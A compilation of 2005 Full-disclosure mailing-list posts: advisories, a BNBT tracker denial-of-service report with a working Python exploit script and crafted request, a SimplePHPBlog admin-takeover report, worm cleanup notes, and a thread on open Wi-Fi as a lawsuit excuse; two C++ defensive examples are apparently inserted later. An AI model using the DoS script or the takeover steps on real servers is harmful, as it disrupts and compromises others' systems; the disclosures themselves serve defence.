VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2005-2017 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

06/15/2005 Initial vendor notification
06/15/2005 Initial vendor response
08/29/2005 Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.
[Full-disclosure] Re: Chung's Donut Shop Release: Hacking Sprint PCS Vision
On 8/29/05, ara rhea [EMAIL PROTECTED] wrote:

> Hi my mom has a sprint pcs phone. Its a sanyo 8300. and i cant feger out the pass word. cause when u go to sprint pcs .com u put in ur phone number than ur pass word and i dont no it. and i was woundreing if u can help me please

When |-|4X0ring your mum, your best bet is always going to be social engineering. Try this in your very best Eric Cartman voice:

"Mo-o-o-m! Can I have your cellphone password? It's really important!"

Hth,
Surreal
[Full-disclosure] MDKSA-2005:155 - Updated apache2 packages fix integer overflow vulnerability
Mandriva Linux Security Update Advisory
___

Package name:      apache2
Advisory ID:       MDKSA-2005:155
Date:              August 29th, 2005
Affected versions: 10.0, Corporate 3.0, Multi Network Firewall 2.0
___

Problem Description:

Integer overflow in pcre_compile.c in Perl Compatible Regular Expressions (PCRE) before 6.2, as used in multiple products, allows attackers to execute arbitrary code via quantifier values in regular expressions, which leads to a heap-based buffer overflow.

The apache2 packages, as shipped, were built using a private copy of pcre. The updated packages have been rebuilt against the system pcre libs to correct this problem. 10.1 and 10.2/LE2005 are already built against the system pcre.
___

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2491
___

Updated Packages:
[Full-disclosure] SimplePHPBlog Arbitrary File Deletion and Sample Exploit
SimplePHPBlog has a vulnerability in its comment_delete_cgi.php. The PHP script allows for the arbitrary deletion of files.

Please see the following link for a perl script to demonstrate the exploit:

http://www.ftusecurity.com/pub/sphpblog_vulns

(Please add the .pl extension, as my ISP server preprocesses the file if it is .pl or txt.)

This vulnerability, in combination with the fact that the installation scripts are left on the server after installation, allows an arbitrary user to reset the admin password to one of the attacker's choosing. The script demonstrates the ability to delete files, reset the admin password to the attacker's choosing and upload files (including a command prompt).

The exploit is for educational purposes only.

To prevent this exploit change the line in comment_delete_cgi.php from

    $logged_in = logged_in( false, true );

to

    $logged_in = logged_in( true, true );

Sincerely,

'ken'@FTU
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
[Full-disclosure] The Wireless Networking Excuse
Has anyone examined the idea of using a public hotspot on a local network to shield BSA, RIAA, MPAA lawsuits? Since the tracking stops at the public facing IP, who is to say it wasn't some freeloader downloading the warez?

Just looking for some feedback on this one...
[Full-disclosure] Re: Xcon2005 papers released (alert7)
finally it's online. :-)

btw, got audio/video files? i suppose you recorded it all, right?
[Full-disclosure] Re: The Wireless Networking Excuse
On 8/29/05, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:

> Has anyone examined the idea of using a public hotspot on a local network to shield BSA, RIAA, MPAA lawsuits? Since the tracking stops at the public facing IP, who is to say it wasn't some freeloader downloading the warez?
>
> Just looking for some feedback on this one...

It is an interesting point. I have thought about it myself in the context of having my personal access point open to the public and if someone hopped on and downloaded something. Would I be responsible if they tracked it back to my AP?

I am not a legal expert by any means but I would think it would be comparable to someone using my phone to make a harassing call. Although I am not sure how that would be ruled either.
[Full-disclosure] BNBT EasyTracker Remote Denial of Service Vulnerability
BNBT EasyTracker Remote Denial of Service Vulnerability

by Sowhat
Last Update: 2005.08.30
http://secway.org/advisory/AD20050830.txt

Vendor: http://bnbteasytracker.sourceforge.net/
Product Affected: 7.7r3.2004.10.27 and below

Overview:

BNBT was written by Trevor Hogan. BNBT is a complete port of the original Python BitTorrent tracker to C++ for speed and efficiency. BNBT also offers many additional features beyond the original Python BitTorrent tracker, plus it's easy to use and customizable. BNBT is covered under the GNU Lesser General Public License (LGPL).

A Denial of Service vulnerability exists within BNBT which allows for an attacker to cause the BNBT to stop responding.

Details:

A specifically crafted HTTP request will cause the BNBT Server to stop responding. Sending a request like

    GET /index.htm HTTP/1.1\r\n:\r\n\r\n

will reproduce the problem.

It seems that the bug is located in client.cpp, in the "// grab headers" section. And it is something like 1-2 = -1 and similar to memcpy(-1) ?

    // grab headers
    string :: size_type iNewLine = m_strReceiveBuf.find( "\r\n" );
    string :: size_type iDoubleNewLine = m_strReceiveBuf.find( "\r\n\r\n" );

    strTemp = m_strReceiveBuf.substr( iNewLine + strlen( "\r\n" ), iDoubleNewLine - iNewLine - strlen( "\r\n" ) );

    while( 1 )
    {
        string :: size_type iSplit = strTemp.find( ":" );
        string :: size_type iEnd = strTemp.find( "\r\n" );

        if( iSplit == string :: npos )
        {
            UTIL_LogPrint( "client warning - malformed HTTP request (bad header)\n" );
            break;
        }

        string strKey = strTemp.substr( 0, iSplit );
        string strValue = strTemp.substr( iSplit + strlen( ":" ), iEnd - iSplit - strlen( "\r\n" ) );   // Bug here ??

        rqst.mapHeaders.insert( pair<string, string>( strKey, strValue ) );

        strTemp = strTemp.substr( iEnd + strlen( "\r\n" ) );

        if( iEnd == string :: npos )
            break;
    }

However, I am not quite sure about that, and it seems that it is only a D.O.S, so I haven't dug deep into it.

Exploit:

    # BNBTDOS.py
    # BNBT EasyTracker Remote D.O.S Exploit
    # Bug discovered and coded by Sowhat
    # http://secway.org
    # Version 7.7r3.2004.10.27 and below
    # the BNBT project: http://bnbteasytracker.sourceforge.net/

    import sys
    import string
    import socket

    if (len(sys.argv) != 2):
        print "\nUsage: " + sys.argv[0] + " TargetIP\n"
        print "###########################################"
        print "#                                         #"
        print "# BNBT EasyTracker Remote D.O.S Exploit   #"
        print "# Bug discovered and coded by Sowhat      #"
        print "# http://secway.org                       #"
        print "###########################################"
        sys.exit(0)

    host = sys.argv[1]
    port = 6969

    payload = "GET /index.htm HTTP/1.1\r\n:\r\n\r\n"

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.send(payload)

WORKAROUND:

No WORKAROUND this time. plz check the vendor's website for update. Maybe there will be a patch later (?)

Vendor Response:

2005.08.22 Vendor notified via Webform, no email found
2005.08.30 Vendor no response. Advisory Released

Life is like a bug, Do you know how to exploit it ?
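The parsing weakness Sowhat points at, written defensively as an added example (not BNBT's code): every find() result is tested against npos before it feeds a substr() position or length, and a header line with an empty key such as ":" is rejected rather than parsed. The request strings in main are constructed to match the advisory.

```cpp
// Added example (not BNBT's code): a header parser that never does arithmetic
// on an unchecked std::string::find() result. In the snippet quoted above,
// npos (size_t(-1)) can flow into substr() when a line lacks ":" or "\r\n";
// here each such case is detected and the request is rejected.
#include <cstdio>
#include <map>
#include <string>

using Headers = std::map<std::string, std::string>;

// Parses "<request line>\r\n<Key>: <Value>\r\n...\r\n\r\n" into out.
// Returns false (leaving out untouched) on any malformed input; a server
// should then log and drop the connection instead of trusting the values.
bool parseHeaders(const std::string &buf, Headers &out) {
    const std::string CRLF = "\r\n";
    const std::string::size_type npos = std::string::npos;
    std::string::size_type lineEnd = buf.find(CRLF);
    std::string::size_type blank = buf.find(CRLF + CRLF);
    if (lineEnd == npos || blank == npos)
        return false;                       // no request line or no terminator
    Headers parsed;
    std::string::size_type pos = lineEnd + CRLF.size();
    while (pos < blank) {                   // one "Key: Value\r\n" per iteration
        std::string::size_type eol = buf.find(CRLF, pos);
        if (eol == npos || eol > blank) return false;
        std::string::size_type colon = buf.find(':', pos);
        if (colon == npos || colon >= eol || colon == pos)
            return false;                   // no colon, or empty key (":\r\n")
        std::string key = buf.substr(pos, colon - pos);
        std::string::size_type vstart = colon + 1;
        while (vstart < eol && buf[vstart] == ' ') ++vstart;   // skip leading spaces
        parsed[key] = buf.substr(vstart, eol - vstart);
        pos = eol + CRLF.size();
    }
    out.swap(parsed);
    return true;
}

int main() {
    // Constructed requests: the malformed one from the advisory and a sane one.
    const std::string bad = "GET /index.htm HTTP/1.1\r\n:\r\n\r\n";
    const std::string good =
        "GET /announce HTTP/1.1\r\nHost: tracker.example:6969\r\nUser-Agent: x\r\n\r\n";
    Headers h;
    std::printf("malformed request accepted: %s\n", parseHeaders(bad, h) ? "yes" : "no");
    std::printf("well-formed request accepted: %s\n", parseHeaders(good, h) ? "yes" : "no");
    for (const auto &kv : h) std::printf("  %s = %s\n", kv.first.c_str(), kv.second.c_str());
    return 0;
}
```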
Re: [Full-disclosure] Re: The Wireless Networking Excuse
On Mon, 29 Aug 2005, womber wrote:

> On 8/29/05, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
>
> > Has anyone examined the idea of using a public hotspot on a local network to shield BSA, RIAA, MPAA lawsuits? Since the tracking stops at the public facing IP, who is to say it wasn't some freeloader downloading the warez?
> >
> > Just looking for some feedback on this one...
>
> It is an interesting point. I have thought about it myself in the context of having my personal access point open to the public and if someone hopped on and downloaded something. Would I be responsible if they tracked it back to my AP?
>
> I am not a legal expert by any means but I would think it would be comparable to someone using my phone to make a harassing call. Although I am not sure how that would be ruled either.

I am not an attorney and this is not legal advice -- I have heard that there is case law supporting that unsecured wireless communication are public domain, just as wireless telephone conversations are not considered privileged by the Court. If this is the case, then anyone with default wireless router settings are a legal public hotspot.

If there is an attorney on this list I would love to read the actual opinion of this (these) alleged case(s). Currently, this information must be considered hearsay.

In the Portland area we have so many WAPs which are open that all we need to do is create wireless-bridging/routing points to route packets between overlapping wireless networks. In many cases, this wireless MAN would be faster point-to-point than going out the Internet and back to its destination. Since this MAN would be behind routers for the most part, bring your own firewall ;)

-- Does anyone know of decent (cheap) low-power microcontrollers having 802.11 with I/O 5Mbit which support Linux?

-Eric

--
Eric Wheeler
Vice President
National Security Concepts, Inc.
PO Box 3567
Tualatin, OR 97062
http://www.nsci.us/

Voice: (503) 293-7656
Fax: (503) 885-0770
Re: [Full-disclosure] Re: The Wireless Networking Excuse
On Mon, 29 Aug 2005 21:33:06 CDT, womber said:

> It is an interesting point. I have thought about it myself in the context of having my personal access point open to the public and if someone hopped on and downloaded something. Would I be responsible if they tracked it back to my AP?

Anybody who tries the "The giant pink iguana with a Pringles can did it" defense had better make damned sure they can prove in a court of law that there was indeed a giant pink iguana.

And at that point, you may have to explain why you knowingly provided access to allow the commission of a crime - aiding and abetting isn't someplace you want to be..
[Full-disclosure] No one else seeing the new MS05-039 worm yet?
This has been going around since early Monday afternoon. Symantec and other AV vendors have had code since then, and no details STILL. I guess one can call it the Katrina worm until something better comes along.

Details:

- Exploits MS05-039, but also MS04-011 and MS03-026.
- Scans on port 5000 and 135.
- On workstations opens up range of listening ports above 1024, visible with netstat -a.
- Creates 40K svc.exe and several randomly named LARGE .exe files in: C:\WINNT directory.
- Sticks a long line of hosts resolving to broadcast address in: C:\WINNT\System32\Drivers\etc in hosts file.
- Adds reg key(s) under: HKLM\Software\Microsoft\Windows\CurrentVersion\Run which are those random .exe file names mentioned above.
- May create svc.exe and exe.tmp reg keys under: HKCU\Software\Microsoft\Internet Explorer\Explorer Bars\(machine key)\FilesNamedMRU (may be unrelated, not generally found on infected box).
- Prevents killing processes via Task Manager (all processes backed by gray color, clicking individual processes does nothing).
- One can use other utilities to kill running malware processes.
- Symantec may report as [EMAIL PROTECTED] and/or W32.HLLW.Nebiwo.

Cleanup:

- Backup registry.
- Delete malware-related reg keys as noted.
- Delete malware-related files.
- Re-check registry, as executables may enter new values before all cleanup actions complete.
- Edit hosts file, removing added data and saving afterward.
- Empty Recycle Bin.
- Patch infected machine.
- Reboot.
- Verify that symptoms are gone.

I've not had time to decompile code to dig out other details, but cleanup routine seems sufficient for most part. Have had working routine since early afternoon, and expected details from vendors long before now.

Peace,
Vic
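Detection logic for the hosts-file symptom in the list above, as an added example that is not part of Vic's post: it scans hosts-file text and reports every entry whose address is a broadcast address, with the names that entry would redirect. The sample hosts text is constructed, and treating 255.255.255.255 (or any address ending in .255) as a broadcast address is my assumption.

```cpp
// Added example (not from the original post): flag hosts-file entries that
// map names to a broadcast address, one of the worm symptoms listed above.
// Assumption: 255.255.255.255 or any dotted-quad ending in .255 counts.
#include <cstdio>
#include <sstream>
#include <string>
#include <vector>

struct HostsHit {
    int line;                           // 1-based line number in the file
    std::string ip;                     // the suspicious address
    std::vector<std::string> names;     // hostnames redirected to it
};

bool looksBroadcast(const std::string &ip) {
    if (ip == "255.255.255.255") return true;
    std::string::size_type dot = ip.rfind('.');
    return dot != std::string::npos && ip.substr(dot + 1) == "255";
}

// Scans hosts-file text; comments (#...) and blank lines are skipped, and
// trailing '\r' from Windows line endings is treated as whitespace.
std::vector<HostsHit> scanHosts(const std::string &text) {
    std::vector<HostsHit> hits;
    std::istringstream in(text);
    std::string line;
    int n = 0;
    while (std::getline(in, line)) {
        ++n;
        std::string::size_type hash = line.find('#');
        if (hash != std::string::npos) line.erase(hash);   // drop comment part
        std::istringstream fields(line);
        std::string ip;
        if (!(fields >> ip)) continue;                     // nothing on the line
        if (!looksBroadcast(ip)) continue;
        HostsHit hit{n, ip, {}};
        std::string name;
        while (fields >> name) hit.names.push_back(name);  // one long line of names
        hits.push_back(hit);
    }
    return hits;
}

// Constructed sample resembling the symptom: a long line of names on one
// broadcast entry, next to a normal localhost entry.
const std::string kSampleHosts =
    "# Copyright (c) 1993-1999 Microsoft Corp.\r\n"
    "127.0.0.1       localhost\r\n"
    "255.255.255.255 host1.example.invalid host2.example.invalid host3.example.invalid\r\n"
    "10.0.0.255 host4.example.invalid  # caught by the .255 heuristic\r\n";

int main() {
    for (const HostsHit &h : scanHosts(kSampleHosts)) {
        std::printf("line %d: %s -> %zu name(s)\n", h.line, h.ip.c_str(), h.names.size());
        for (const std::string &nm : h.names) std::printf("    %s\n", nm.c_str());
    }
    return 0;
}
```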
[Full-disclosure] [SECURITY] [DSA 790-1] New phpldapadmin packages fix unauthorised access
- --
Debian Security Advisory DSA 790-1          [EMAIL PROTECTED]
http://www.debian.org/security/             Martin Schulze
August 30th, 2005                           http://www.debian.org/security/faq
- --

Package        : phpldapadmin
Vulnerability  : programming error
Problem-Type   : remote
Debian-specific: no
CVE ID         : CAN-2005-2654
Debian Bug     : 322423

Alexander Gerasiov discovered that phpldapadmin, a web based interface for administering LDAP servers, allows anybody to access the LDAP server anonymously, even if this is disabled in the configuration with the disable_anon_bind statement.

The old stable distribution (woody) is not vulnerable to this problem.

For the stable distribution (sarge) this problem has been fixed in version 0.9.5-3sarge1.

For the unstable distribution (sid) this problem has been fixed in version 0.9.6c-5.

We recommend that you upgrade your phpldapadmin package.

Upgrade Instructions
- --

wget url
    will fetch the file for you
dpkg -i file.deb
    will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
    will update the internal database
apt-get upgrade
    will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge
- --

Source archives:

http://security.debian.org/pool/updates/main/p/phpldapadmin/phpldapadmin_0.9.5-3sarge2.dsc
    Size/MD5 checksum:    619 d6da0a97614965ba396e3ca4079ddabb
http://security.debian.org/pool/updates/main/p/phpldapadmin/phpldapadmin_0.9.5-3sarge2.diff.gz
    Size/MD5 checksum:  11564 543a7a99fb997976bbdaa51056e85d4f
http://security.debian.org/pool/updates/main/p/phpldapadmin/phpldapadmin_0.9.5.orig.tar.gz
    Size/MD5 checksum: 617707 fb0669d4c4b8857387aef2630de8

Architecture independent components:

http://security.debian.org/pool/updates/main/p/phpldapadmin/phpldapadmin_0.9.5-3sarge2_all.deb
    Size/MD5 checksum: 616852 2ea5bc2d2f2eb0736f75cc8b48618842

These files will probably be moved into the stable distribution on its next update.

- --
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show pkg' and http://packages.debian.org/pkg